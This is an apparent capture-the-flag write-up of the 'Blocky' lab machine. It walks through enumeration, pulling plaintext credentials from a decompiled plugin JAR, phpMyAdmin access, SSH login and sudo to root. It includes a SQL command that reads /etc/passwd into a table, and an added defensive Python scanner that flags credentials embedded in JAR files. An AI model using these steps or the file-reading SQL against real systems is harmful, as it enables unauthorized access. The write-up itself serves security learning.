Summary

Blocky is an easy Linux box. It can be exploited by properly enumerating the application. Brute-forcing files and directories leads to a wiki page that discloses some useful information. This led to checking the plugins directory, which contains a .jar file that can be analysed and that holds plaintext credentials. These were used to authenticate to phpMyAdmin. The wp_users table contained more plaintext credentials. These provided a shell as the notch user. Notch is allowed to run all commands with sudo on the server, so sudo su was used to get a root shell.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 7.2p2 
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open  minecraft Minecraft 1.11.2 

Navigating to the web server shows a Minecraft website. Gobuster was run to scan for files and directories:

http://10.129.1.53/wiki (Status: 301)
http://10.129.1.53/wp-content (Status: 301)
http://10.129.1.53/wp-login.php (Status: 200)
http://10.129.1.53/plugins (Status: 301)
http://10.129.1.53/wp-includes (Status: 301)
http://10.129.1.53/javascript (Status: 301)
http://10.129.1.53/index.php (Status: 301)
http://10.129.1.53/wp-trackback.php (Status: 200)
http://10.129.1.53/wp-admin (Status: 301)
http://10.129.1.53/phpmyadmin (Status: 301)
http://10.129.1.53/wp-signup.php (Status: 302)
http://10.129.1.53/server-status (Status: 403)

The wiki was checked and contained the following text:

Please check back later! We will start publishing wiki articles after we have finished the main server plugin! The new core plugin will store your playtime and other information in our database, so you can see your own stats!

Credential Discovery

This led to navigating to the plugin directory where the following two files were found:

Since there was such a strong indication something is up with these files, they were analysed with jd-gui. It found the following plaintext credentials:

Tried to SSH but this did not work:

root@10.129.1.53's password: 
Permission denied, please try again.

Next, I authenticated to phpMyAdmin with these credentials. This worked and by checking the WordPress tables, I found the following credentials:

FYI, you can also run SQL code so you could run something like this to obtain the passwd file:

load data local infile "/etc/passwd" into table wp_users FIELDS TERMINATED BY '\n';

Fortunately, these plaintext credentials could be used to create an SSH shell as Notch.
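
From the defender's side, the kind of plaintext credentials that jd-gui surfaced in the plugin .jar can be caught before a build is published to a web-reachable directory. The following is an added example, not part of the original writeup or the box's plugin: it parses each class's constant pool and reports classes that pair a credential-like identifier with string literals. The regex, the class name com/example/Demo, the field name dbPassword and the placeholder literal are constructed assumptions.

```python
import io, re, struct, zipfile
# Payload size per constant-pool tag; Utf8 (tag 1) is variable length and handled below.
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
            15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
SUSPECT = re.compile(r"pass|pwd|secret|token|credential", re.I)  # assumed name heuristic

def parse_constant_pool(data):
    """Return ({index: utf8 text}, {indexes used as String literals}) for one class file."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count = struct.unpack_from(">H", data, 8)[0]
    utf8, literal_idx, pos, idx = {}, set(), 10, 1
    while idx < count:
        tag = data[pos]
        if tag == 1:  # CONSTANT_Utf8: u2 length, then that many bytes
            n = struct.unpack_from(">H", data, pos + 1)[0]
            utf8[idx] = data[pos + 3:pos + 3 + n].decode("utf-8", "replace")
            pos += 3 + n
        else:
            if tag == 8:  # CONSTANT_String points at the Utf8 entry holding the literal
                literal_idx.add(struct.unpack_from(">H", data, pos + 1)[0])
            pos += 1 + CP_SIZES[tag]
        idx += 2 if tag in (5, 6) else 1  # long and double occupy two slots
    return utf8, literal_idx

def scan_jar(jar_bytes):
    """Map class path -> (suspect identifiers, string literals) for classes needing review."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in filter(lambda n: n.endswith(".class"), jar.namelist()):
            utf8, lit = parse_constant_pool(jar.read(name))
            idents = sorted(s for i, s in utf8.items() if i not in lit and SUSPECT.search(s))
            if idents and lit:
                findings[name] = (idents, sorted(utf8[i] for i in lit))
    return findings

def _utf8(text):
    return b"\x01" + struct.pack(">H", len(text.encode())) + text.encode()

def sample_jar():
    """Constructed input: a JAR with one minimal class, a field name and a placeholder literal."""
    cp = (_utf8("com/example/Demo") + b"\x07\x00\x01" + _utf8("java/lang/Object")
          + b"\x07\x00\x03" + _utf8("dbPassword") + _utf8("Ljava/lang/String;")
          + _utf8("EXAMPLE-PLACEHOLDER") + b"\x08\x00\x07")  # 8 entries, so count is 9
    cls = (b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 9) + cp
           + struct.pack(">7H", 0x21, 2, 4, 0, 0, 0, 0))  # flags, this, super, empty tables
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("com/example/Demo.class", cls)
    return buf.getvalue()
```

Calling scan_jar(sample_jar()) returns the flagged class with its matching identifier and literal; a hit is a prompt for manual review, since the name heuristic will also match harmless identifiers.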


Privilege Escalation

It’s always a good idea to first check what commands your user is allowed to run with sudo -l:

notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
(ALL : ALL) ALL

Notch is allowed to run all commands with sudo, so there's no need for actual privilege escalation; you can simply cat root.txt:

sudo cat /root/root.txt

If you want a proper root shell, use:

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)

Conclusion

This was a very simple and straightforward box. It didn’t take me long to root, but I learned about a new tool, jd-gui, so it was useful nonetheless. Hope you enjoyed this writeup!